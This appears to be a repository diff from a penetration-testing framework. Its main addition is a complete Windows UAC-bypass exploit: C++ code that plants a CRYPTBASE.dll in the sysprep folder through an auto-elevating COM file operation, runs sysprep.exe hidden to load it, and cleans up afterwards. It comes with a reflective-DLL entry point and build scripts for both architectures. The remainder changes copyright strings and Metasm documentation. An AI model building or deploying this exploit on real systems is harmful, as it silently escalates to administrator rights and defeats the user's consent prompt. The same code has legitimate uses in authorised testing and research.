<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
IF EXIST "..\..\..\..\..\data\post\" GOTO COPY
|
||||||
|
mkdir "..\..\..\..\..\data\post\"
|
||||||
|
:COPY
|
||||||
|
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<Midl>
|
||||||
|
<TargetEnvironment>X64</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>MaxSpeed</Optimization>
|
||||||
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<CompileAs>CompileAsCpp</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<TargetMachine>MachineX64</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
IF EXIST "..\..\..\..\..\data\post\" GOTO COPY
|
||||||
|
mkdir "..\..\..\..\..\data\post\"
|
||||||
|
:COPY
|
||||||
|
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="src\Exploit.cpp" />
|
||||||
|
<ClCompile Include="src\ReflectiveDll.c" />
|
||||||
|
<ClCompile Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="src\Exploit.h" />
|
||||||
|
<ClInclude Include="..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
|
||||||
|
<ClInclude Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
|
||||||
|
</ItemGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
</ImportGroup>
|
||||||
|
</Project>
|
|
@ -0,0 +1,119 @@
|
||||||
|
#include "Exploit.h"
|
||||||
|
|
||||||
|
void exploit()
|
||||||
|
{
|
||||||
|
|
||||||
|
const wchar_t *szSysPrepDir = L"\\System32\\sysprep\\";
|
||||||
|
const wchar_t *szSysPrepDir_syswow64 = L"\\Sysnative\\sysprep\\";
|
||||||
|
const wchar_t *sySysPrepExe = L"sysprep.exe";
|
||||||
|
const wchar_t *szElevDll = L"CRYPTBASE.dll";
|
||||||
|
const wchar_t *szSourceDll = L"CRYPTBASE.dll";
|
||||||
|
wchar_t szElevDir[MAX_PATH] = {};
|
||||||
|
wchar_t szElevDir_syswow64[MAX_PATH] = {};
|
||||||
|
wchar_t szElevDllFull[MAX_PATH] = {};
|
||||||
|
wchar_t szElevDllFull_syswow64[MAX_PATH] = {};
|
||||||
|
wchar_t szElevExeFull[MAX_PATH] = {};
|
||||||
|
wchar_t path[MAX_PATH] = {};
|
||||||
|
wchar_t windir[MAX_PATH] = {};
|
||||||
|
const wchar_t *szElevArgs = L"";
|
||||||
|
const wchar_t *szEIFOMoniker = NULL;
|
||||||
|
PVOID OldValue = NULL;
|
||||||
|
|
||||||
|
IFileOperation *pFileOp = NULL;
|
||||||
|
IShellItem *pSHISource = 0;
|
||||||
|
IShellItem *pSHIDestination = 0;
|
||||||
|
IShellItem *pSHIDelete = 0;
|
||||||
|
|
||||||
|
const IID *pIID_EIFO = &__uuidof(IFileOperation);
|
||||||
|
const IID *pIID_EIFOClass = &__uuidof(FileOperation);
|
||||||
|
const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);
|
||||||
|
|
||||||
|
GetWindowsDirectoryW(windir, MAX_PATH);
|
||||||
|
GetTempPathW(MAX_PATH, path);
|
||||||
|
|
||||||
|
/* %temp%\cryptbase.dll */
|
||||||
|
wcscat_s(path, MAX_PATH, szSourceDll);
|
||||||
|
|
||||||
|
/* %windir%\System32\sysprep\ */
|
||||||
|
wcscat_s(szElevDir, MAX_PATH, windir);
|
||||||
|
wcscat_s(szElevDir, MAX_PATH, szSysPrepDir);
|
||||||
|
|
||||||
|
/* %windir%\sysnative\sysprep\ */
|
||||||
|
wcscat_s(szElevDir_syswow64, MAX_PATH, windir);
|
||||||
|
wcscat_s(szElevDir_syswow64, MAX_PATH, szSysPrepDir_syswow64);
|
||||||
|
|
||||||
|
/* %windir\system32\sysprep\cryptbase.dll */
|
||||||
|
wcscat_s(szElevDllFull, MAX_PATH, szElevDir);
|
||||||
|
wcscat_s(szElevDllFull, MAX_PATH, szElevDll);
|
||||||
|
|
||||||
|
/* %windir\sysnative\sysprep\cryptbase.dll */
|
||||||
|
wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDir_syswow64);
|
||||||
|
wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDll);
|
||||||
|
|
||||||
|
/* %windir%\system32\sysprep\sysprep.exe */
|
||||||
|
wcscat_s(szElevExeFull, MAX_PATH, szElevDir);
|
||||||
|
wcscat_s(szElevExeFull, MAX_PATH, sySysPrepExe);
|
||||||
|
|
||||||
|
if (CoInitialize(NULL) == S_OK)
|
||||||
|
{
|
||||||
|
if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**) &pFileOp) == S_OK)
|
||||||
|
{
|
||||||
|
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) == S_OK)
|
||||||
|
{
|
||||||
|
if (SHCreateItemFromParsingName((PCWSTR) path, NULL, *pIID_ShellItem2, (void**) &pSHISource) == S_OK)
|
||||||
|
{
|
||||||
|
if (SHCreateItemFromParsingName(szElevDir, NULL, *pIID_ShellItem2, (void**) &pSHIDestination) == S_OK)
|
||||||
|
{
|
||||||
|
if (pFileOp->CopyItem(pSHISource, pSHIDestination, szElevDll, NULL) == S_OK)
|
||||||
|
{
|
||||||
|
/* Copy the DLL file to the sysprep folder*/
|
||||||
|
if (pFileOp->PerformOperations() == S_OK)
|
||||||
|
{
|
||||||
|
/* Execute sysprep.exe */
|
||||||
|
SHELLEXECUTEINFOW shinfo;
|
||||||
|
ZeroMemory(&shinfo, sizeof(shinfo));
|
||||||
|
shinfo.cbSize = sizeof(shinfo);
|
||||||
|
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
|
||||||
|
shinfo.lpFile = szElevExeFull;
|
||||||
|
shinfo.lpParameters = szElevArgs;
|
||||||
|
shinfo.lpDirectory = szElevDir;
|
||||||
|
shinfo.nShow = SW_HIDE;
|
||||||
|
|
||||||
|
Wow64DisableWow64FsRedirection(&OldValue);
|
||||||
|
if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
|
||||||
|
{
|
||||||
|
WaitForSingleObject(shinfo.hProcess, 10000);
|
||||||
|
CloseHandle(shinfo.hProcess);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (S_OK == SHCreateItemFromParsingName(szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
|
||||||
|
{
|
||||||
|
if (0 != pSHIDelete)
|
||||||
|
{
|
||||||
|
if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
|
||||||
|
{
|
||||||
|
pFileOp->PerformOperations();
|
||||||
|
// If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
|
||||||
|
// DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
|
||||||
|
// http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
|
||||||
|
if (S_OK == SHCreateItemFromParsingName(szElevDllFull_syswow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
|
||||||
|
{
|
||||||
|
if (0 != pSHIDelete)
|
||||||
|
{
|
||||||
|
if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
|
||||||
|
{
|
||||||
|
pFileOp->PerformOperations();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
|
@ -0,0 +1,8 @@
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <commctrl.h>
|
||||||
|
#include <shlobj.h>
|
||||||
|
#include <Shellapi.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <guiddef.h>
|
||||||
|
|
||||||
|
EXTERN_C void exploit();
|
|
@ -0,0 +1,26 @@
|
||||||
|
#include "ReflectiveLoader.h"
|
||||||
|
#include "Exploit.h"
|
||||||
|
|
||||||
|
extern HINSTANCE hAppInstance;
|
||||||
|
|
||||||
|
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
|
||||||
|
{
|
||||||
|
BOOL bReturnValue = TRUE;
|
||||||
|
switch( dwReason )
|
||||||
|
{
|
||||||
|
case DLL_QUERY_HMODULE:
|
||||||
|
if( lpReserved != NULL )
|
||||||
|
*(HMODULE *)lpReserved = hAppInstance;
|
||||||
|
break;
|
||||||
|
case DLL_PROCESS_ATTACH:
|
||||||
|
hAppInstance = hinstDLL;
|
||||||
|
exploit();
|
||||||
|
ExitProcess(0);
|
||||||
|
break;
|
||||||
|
case DLL_PROCESS_DETACH:
|
||||||
|
case DLL_THREAD_ATTACH:
|
||||||
|
case DLL_THREAD_DETACH:
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
return bReturnValue;
|
||||||
|
}
|
|
@ -0,0 +1,38 @@
|
||||||
|
@ECHO OFF
|
||||||
|
IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
|
||||||
|
|
||||||
|
IF "%1"=="x86" GOTO BUILD_X86
|
||||||
|
IF "%1"=="X86" GOTO BUILD_X86
|
||||||
|
IF "%1"=="x64" GOTO BUILD_X64
|
||||||
|
IF "%1"=="X64" GOTO BUILD_X64
|
||||||
|
|
||||||
|
ECHO "Building Exploits x64 and x86 (Release)"
|
||||||
|
SET PLAT=all
|
||||||
|
GOTO RUN
|
||||||
|
|
||||||
|
:BUILD_X86
|
||||||
|
ECHO "Building Exploits x86 (Release)"
|
||||||
|
SET PLAT=x86
|
||||||
|
GOTO RUN
|
||||||
|
|
||||||
|
:BUILD_X64
|
||||||
|
ECHO "Building Exploits x64 (Release)"
|
||||||
|
SET PLAT=x64
|
||||||
|
GOTO RUN
|
||||||
|
|
||||||
|
:RUN
|
||||||
|
ECHO "Building Bypass UAC Injection"
|
||||||
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
|
|
||||||
|
|
||||||
|
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
|
||||||
|
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
|
||||||
|
echo Finished %ldt%
|
||||||
|
|
||||||
|
GOTO :END
|
||||||
|
|
||||||
|
:NEED_VS
|
||||||
|
ECHO "This command must be executed from within a Visual Studio Command prompt."
|
||||||
|
ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
|
||||||
|
|
||||||
|
:END
|
|
@ -0,0 +1,19 @@
|
||||||
|
<?xml version="1.0" standalone="yes"?>
|
||||||
|
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<PropertyGroup>
|
||||||
|
<SolutionPath>.\bypassuac_injection.sln</SolutionPath>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<Target Name="all" DependsOnTargets="x86;x64" />
|
||||||
|
|
||||||
|
<Target Name="x86">
|
||||||
|
<Message Text="Building Bypass UAC (Injection) Release version x86" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
|
||||||
|
<Target Name="x64">
|
||||||
|
<Message Text="Building Bypass UAC (Injection) Release version x64" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
</Project>
|
||||||
|
|
|
@ -47,6 +47,20 @@ IF "%ERRORLEVEL%"=="0" (
|
||||||
POPD
|
POPD
|
||||||
)
|
)
|
||||||
|
|
||||||
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
|
ECHO "Building bypassuac (on-disk)"
|
||||||
|
PUSHD bypassuac
|
||||||
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
|
POPD
|
||||||
|
)
|
||||||
|
|
||||||
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
|
ECHO "Building bypassuac (in-memory)"
|
||||||
|
PUSHD bypassuac_injection
|
||||||
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
|
POPD
|
||||||
|
)
|
||||||
|
|
||||||
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
|
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
|
||||||
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
|
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
|
||||||
echo Finished %ldt%
|
echo Finished %ldt%
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
; Title: Windows Bind Stager (NX, IPv6)
|
; Title: Windows Bind Stager (NX, IPv6)
|
||||||
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
|
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
|
||||||
; Author: Rapid7 LLC
|
; Author: Rapid7, Inc
|
||||||
|
|
||||||
[BITS 32]
|
[BITS 32]
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
; Title: Windows Reverse Connect Stager (NX, IPv6)
|
; Title: Windows Reverse Connect Stager (NX, IPv6)
|
||||||
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista
|
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista
|
||||||
; Author: Rapid7 LLC
|
; Author: Rapid7, Inc
|
||||||
|
|
||||||
[BITS 32]
|
[BITS 32]
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
Copyright (C) 2006-2010, Rapid7 LLC
|
Copyright (C) 2006-2010, Rapid7, Inc
|
||||||
All rights reserved.
|
All rights reserved.
|
||||||
|
|
||||||
Redistribution and use in source and binary forms, with or without modification,
|
Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
@ -11,7 +11,7 @@ are permitted provided that the following conditions are met:
|
||||||
this list of conditions and the following disclaimer in the documentation
|
this list of conditions and the following disclaimer in the documentation
|
||||||
and/or other materials provided with the distribution.
|
and/or other materials provided with the distribution.
|
||||||
|
|
||||||
* Neither the name of Rapid7 LLC nor the names of its contributors
|
* Neither the name of Rapid7, Inc nor the names of its contributors
|
||||||
may be used to endorse or promote products derived from this software
|
may be used to endorse or promote products derived from this software
|
||||||
without specific prior written permission.
|
without specific prior written permission.
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
// Copyright (C) 2006-2010, Rapid7 LLC
|
// Copyright (C) 2006-2010, Rapid7, Inc
|
||||||
// All rights reserved.
|
// All rights reserved.
|
||||||
//
|
//
|
||||||
// Redistribution and use in source and binary forms, with or without modification,
|
// Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
@ -11,7 +11,7 @@
|
||||||
// this list of conditions and the following disclaimer in the documentation
|
// this list of conditions and the following disclaimer in the documentation
|
||||||
// and/or other materials provided with the distribution.
|
// and/or other materials provided with the distribution.
|
||||||
//
|
//
|
||||||
// * Neither the name of Rapid7 LLC nor the names of its contributors
|
// * Neither the name of Rapid7, Inc nor the names of its contributors
|
||||||
// may be used to endorse or promote products derived from this software
|
// may be used to endorse or promote products derived from this software
|
||||||
// without specific prior written permission.
|
// without specific prior written permission.
|
||||||
//
|
//
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
// Copyright (C) 2006-2010, Rapid7 LLC
|
// Copyright (C) 2006-2010, Rapid7, Inc
|
||||||
// All rights reserved.
|
// All rights reserved.
|
||||||
//
|
//
|
||||||
// Redistribution and use in source and binary forms, with or without modification,
|
// Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
@ -11,7 +11,7 @@
|
||||||
// this list of conditions and the following disclaimer in the documentation
|
// this list of conditions and the following disclaimer in the documentation
|
||||||
// and/or other materials provided with the distribution.
|
// and/or other materials provided with the distribution.
|
||||||
//
|
//
|
||||||
// * Neither the name of Rapid7 LLC nor the names of its contributors
|
// * Neither the name of Rapid7, Inc nor the names of its contributors
|
||||||
// may be used to endorse or promote products derived from this software
|
// may be used to endorse or promote products derived from this software
|
||||||
// without specific prior written permission.
|
// without specific prior written permission.
|
||||||
//
|
//
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
// Copyright (C) 2006-2010, Rapid7 LLC
|
// Copyright (C) 2006-2010, Rapid7, Inc
|
||||||
// All rights reserved.
|
// All rights reserved.
|
||||||
//
|
//
|
||||||
// Redistribution and use in source and binary forms, with or without modification,
|
// Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
@ -11,7 +11,7 @@
|
||||||
// this list of conditions and the following disclaimer in the documentation
|
// this list of conditions and the following disclaimer in the documentation
|
||||||
// and/or other materials provided with the distribution.
|
// and/or other materials provided with the distribution.
|
||||||
//
|
//
|
||||||
// * Neither the name of Rapid7 LLC nor the names of its contributors
|
// * Neither the name of Rapid7, Inc nor the names of its contributors
|
||||||
// may be used to endorse or promote products derived from this software
|
// may be used to endorse or promote products derived from this software
|
||||||
// without specific prior written permission.
|
// without specific prior written permission.
|
||||||
//
|
//
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
// Copyright (C) 2006-2010, Rapid7 LLC
|
// Copyright (C) 2006-2010, Rapid7, Inc
|
||||||
// All rights reserved.
|
// All rights reserved.
|
||||||
//
|
//
|
||||||
// Redistribution and use in source and binary forms, with or without modification,
|
// Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
@ -11,7 +11,7 @@
|
||||||
// this list of conditions and the following disclaimer in the documentation
|
// this list of conditions and the following disclaimer in the documentation
|
||||||
// and/or other materials provided with the distribution.
|
// and/or other materials provided with the distribution.
|
||||||
//
|
//
|
||||||
// * Neither the name of Rapid7 LLC nor the names of its contributors
|
// * Neither the name of Rapid7, Inc nor the names of its contributors
|
||||||
// may be used to endorse or promote products derived from this software
|
// may be used to endorse or promote products derived from this software
|
||||||
// without specific prior written permission.
|
// without specific prior written permission.
|
||||||
//
|
//
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
// Copyright (C) 2006-2010, Rapid7 LLC
|
// Copyright (C) 2006-2010, Rapid7, Inc
|
||||||
// All rights reserved.
|
// All rights reserved.
|
||||||
//
|
//
|
||||||
// Redistribution and use in source and binary forms, with or without modification,
|
// Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
@ -11,7 +11,7 @@
|
||||||
// this list of conditions and the following disclaimer in the documentation
|
// this list of conditions and the following disclaimer in the documentation
|
||||||
// and/or other materials provided with the distribution.
|
// and/or other materials provided with the distribution.
|
||||||
//
|
//
|
||||||
// * Neither the name of Rapid7 LLC nor the names of its contributors
|
// * Neither the name of Rapid7, Inc nor the names of its contributors
|
||||||
// may be used to endorse or promote products derived from this software
|
// may be used to endorse or promote products derived from this software
|
||||||
// without specific prior written permission.
|
// without specific prior written permission.
|
||||||
//
|
//
|
||||||
|
|
|
@ -1,7 +1,2 @@
|
||||||
# Load a slightly tweaked METASM stub
|
# Load a slightly tweaked METASM stub
|
||||||
require 'metasm/metasm'
|
require 'metasm/metasm'
|
||||||
|
|
||||||
# Manually load the classes we need from METASM
|
|
||||||
require 'metasm/ia32'
|
|
||||||
require 'metasm/mips'
|
|
||||||
require 'metasm/exe_format/shellcode'
|
|
||||||
|
|
|
@ -1,2 +0,0 @@
|
||||||
repo: a1be49ad3727a7dab9202f848ad39b5674e1aada
|
|
||||||
node: 7ec6509ea16231e365fffc91014755c810c27536
|
|
|
@ -21,6 +21,10 @@ Ready-to-use scripts can be found in the samples/ subdirectory, check the
|
||||||
comments in the scripts headers. You can also try the --help argument if
|
comments in the scripts headers. You can also try the --help argument if
|
||||||
you're feeling lucky.
|
you're feeling lucky.
|
||||||
|
|
||||||
|
For more information, check the doc/ subdirectory. The text files can be
|
||||||
|
compiled to html using the misc/txt2html.rb script.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Here is a short overview of the Metasm internals.
|
Here is a short overview of the Metasm internals.
|
||||||
|
|
||||||
|
@ -167,8 +171,8 @@ You can encode/decode an ExeFormat (ie decode sections, imports, headers etc)
|
||||||
Constructor: ExeFormat.decode_file(str), ExeFormat.decode_file_header(str)
|
Constructor: ExeFormat.decode_file(str), ExeFormat.decode_file_header(str)
|
||||||
Methods: ExeFormat#encode_file(filename), ExeFormat#encode_string
|
Methods: ExeFormat#encode_file(filename), ExeFormat#encode_string
|
||||||
|
|
||||||
PE and ELF files have a LoadedPE/LoadedELF counterpart, that is able to work
|
PE and ELF files have a LoadedPE/LoadedELF counterpart, that are able to work
|
||||||
with memory-mmaped versions of those formats (e.g. to debugging running
|
with memory-mmaped versions of those formats (e.g. to debug running
|
||||||
processes)
|
processes)
|
||||||
|
|
||||||
|
|
||||||
|
@ -198,27 +202,31 @@ disassembly/patching easily (using LoadedPE/LoadedELF as ExeFormat)
|
||||||
|
|
||||||
Debugging:
|
Debugging:
|
||||||
|
|
||||||
Metasm includes a few interfaces to allow live debugging.
|
Metasm includes a few interfaces to handle debugging.
|
||||||
The WinOS and LinOS classes offer access to the underlying OS processes (e.g.
|
The WinOS and LinOS classes offer access to the underlying OS processes (e.g.
|
||||||
OS.current.find_process('foobar') will retrieve a running process with foobar
|
OS.current.find_process('foobar') will retrieve a running process with foobar
|
||||||
in its filename ; then process.mem can be used to access its memory.)
|
in its filename ; then process.mem can be used to access its memory.)
|
||||||
|
|
||||||
The Windows and Linux debugging APIs (x86 only) have a basic ruby interface
|
The Windows and Linux low-level debugging APIs have a basic ruby interface
|
||||||
(PTrace32, extended in samples/rubstop.rb ; and WinDBG, a simple mapping of the
|
(PTrace and WinAPI) ; which are used by the unified high-end Debugger class.
|
||||||
windows debugging API) ; those will be more worked on/integrated in the future.
|
Remote debugging is supported through the GDB server wire protocol.
|
||||||
|
|
||||||
|
High-level debuggers can be created with the following ruby line:
|
||||||
|
Metasm::OS.current.create_debugger('foo')
|
||||||
|
|
||||||
|
Only one kind of host debugger class can exist at a time ; to debug multiple
|
||||||
|
processes, attach to other processes using the existing class. This is due
|
||||||
|
to the way the OS debugging API works on Windows and Linux.
|
||||||
|
|
||||||
|
The low-level backends are defined in the os/ subdirectory, the front-end is
|
||||||
|
defined in debug.rb.
|
||||||
|
|
||||||
A linux console debugging interface is available in samples/lindebug.rb ; it
|
A linux console debugging interface is available in samples/lindebug.rb ; it
|
||||||
uses a SoftICE-like look and feel.
|
uses a (simplified) SoftICE-like look and feel.
|
||||||
This interface can talk to a gdb-server through samples/gdbclient.rb ; use
|
It can talk to a gdb-server socket ; use a [udp:]<host:port> target.
|
||||||
[udp:]<host:port> as target.
|
|
||||||
|
|
||||||
The disassembler scripts allow live process interaction by using as target
|
The disassembler-gui sample allow live process interaction when using as
|
||||||
'live:<pid or part of filename>'.
|
target 'live:<pid or part of program name>'.
|
||||||
|
|
||||||
A generic debugging interface is available, it is defined in metasm/os/main.rb
|
|
||||||
It may be accessed using the Metasm::OS.current.create_debugger('foo')
|
|
||||||
|
|
||||||
It can be viewed in action using the GUI and 'open live' target.
|
|
||||||
|
|
||||||
|
|
||||||
C Parser:
|
C Parser:
|
||||||
|
@ -236,7 +244,11 @@ It handles all the constructs i am aware of, except hex floats:
|
||||||
- __int8 etc native types
|
- __int8 etc native types
|
||||||
- Label addresses (&&label)
|
- Label addresses (&&label)
|
||||||
Also note that all those things are parsed, but most of them will fail to
|
Also note that all those things are parsed, but most of them will fail to
|
||||||
compile on the Ia32 backend (the only one implemented so far.)
|
compile on the Ia32/X64 backend (the only one implemented so far.)
|
||||||
|
|
||||||
|
Parsing C files should be done using an existing ExeFormat, with the
|
||||||
|
parse_c_file method. This ensures that format-specific macros/ABI are correctly
|
||||||
|
defined (ex: size of the 'long' type, ABI to pass parameters to functions, etc)
|
||||||
|
|
||||||
When you parse a C String using C::Parser.parse(text), you receive a Parser
|
When you parse a C String using C::Parser.parse(text), you receive a Parser
|
||||||
object. It holds a #toplevel field, which is a C::Block, which holds #structs,
|
object. It holds a #toplevel field, which is a C::Block, which holds #structs,
|
||||||
|
@ -249,15 +261,11 @@ CExpressions...)
|
||||||
|
|
||||||
A C::Parser may be #precompiled to transform it into a simplified version that
|
A C::Parser may be #precompiled to transform it into a simplified version that
|
||||||
is easier to compile: typedefs are removed, control sequences are transformed
|
is easier to compile: typedefs are removed, control sequences are transformed
|
||||||
in if () goto ; etc.
|
into 'if (XX) goto YY;' etc.
|
||||||
|
|
||||||
To compile a C program, use PE/ELF.compile_c, that will create a C::Parser with
|
To compile a C program, use PE/ELF.compile_c, that will create a C::Parser with
|
||||||
exe-specific macros defined (eg __PE__ or __ELF__).
|
exe-specific macros defined (eg __PE__ or __ELF__).
|
||||||
|
|
||||||
The prefered way to create a C::Parser is to initialize it with a CPU and the
|
|
||||||
desired ExeFormat, so that it is
|
|
||||||
correctly initialized (eg type sizes: is long 4 or 8 bytes? etc) ; and
|
|
||||||
may define preprocessor macros needed to correctly parse standard headers.
|
|
||||||
Vendor-specific headers may need to use either #pragma prepare_visualstudio
|
Vendor-specific headers may need to use either #pragma prepare_visualstudio
|
||||||
(to parse the Microsoft Visual Studio headers) or prepare_gcc (for gcc), the
|
(to parse the Microsoft Visual Studio headers) or prepare_gcc (for gcc), the
|
||||||
latter may be auto-detected (or may not).
|
latter may be auto-detected (or may not).
|
||||||
|
|
|
@ -2,13 +2,14 @@ List of TODO items, by section, in random order
|
||||||
|
|
||||||
Ia32
|
Ia32
|
||||||
emu fpu
|
emu fpu
|
||||||
add all sse2 instrs
|
AVX support
|
||||||
realmode
|
realmode
|
||||||
|
|
||||||
X86_64
|
X86_64
|
||||||
decompiler
|
decompiler
|
||||||
|
|
||||||
CPU
|
CPU
|
||||||
|
Arm
|
||||||
Sparc
|
Sparc
|
||||||
Cell
|
Cell
|
||||||
|
|
||||||
|
@ -26,14 +27,14 @@ Assembler
|
||||||
Disasm
|
Disasm
|
||||||
DecodedData
|
DecodedData
|
||||||
Exe decoding generate decodeddata ?
|
